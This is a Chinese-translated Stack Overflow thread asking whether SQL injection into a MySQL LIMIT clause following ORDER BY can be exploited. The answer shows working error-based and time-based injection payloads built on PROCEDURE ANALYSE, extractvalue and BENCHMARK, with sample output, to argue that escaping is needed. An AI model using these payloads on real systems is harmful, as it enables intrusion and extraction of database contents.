这个问题是为了解决我和同事之间的争论。
假设我们有以下查询,在标准 LAMP 服务器上执行。
SELECT field1, field2, field3
FROM some_table
WHERE some_table.field1 = 123
ORDER BY field2 DESC
LIMIT 0, 15
现在让我们假设 limit 子句容易受到 SQL 注入(inject)攻击。
LIMIT [insert anything here], [also insert anything here]
我同事的意思是没有办法利用这种注入(inject),所以没有必要逃避它(因为它需要更多的处理能力和东西)。
我觉得她的推理很愚蠢,但我想不出如何通过举个例子来证明她是错的。
我不能使用 UNION,因为查询使用的是 ORDER BY 子句,而运行查询的 MySQL 用户没有 FILE 权限,所以使用 INTO OUTFILE 也是不可能的。
那么,谁能告诉我们在这个案子上谁是对的?
编辑:查询是使用 PHP 执行的,因此使用分号添加第二个查询将不起作用。
最佳答案
LIMIT 子句容易受到 SQL 注入(inject)攻击,即使它跟在 ORDER BY 之后,如 Maurycy Prodeus demonstrated今年早些时候:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'Voilà! The above solution is based on handy known technique of so-called error based injection. If, therefore, our vulnerable web application discloses the errors of the database engine (this is a real chance, such bad practices are common), we solve the problem. What if our target doesn’t display errors? Are we still able to exploit it successfully?
It turns out that we can combine the above method with another well-known technique – time based injection. In this case, our solution will be as follows:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(), concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)It works. What is interesting that using SLEEP is not possible in this case. That’s why there must be a BENCHMARK instead.
关于mysql - SQL 注入(inject)和 LIMIT 子句,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/22886670/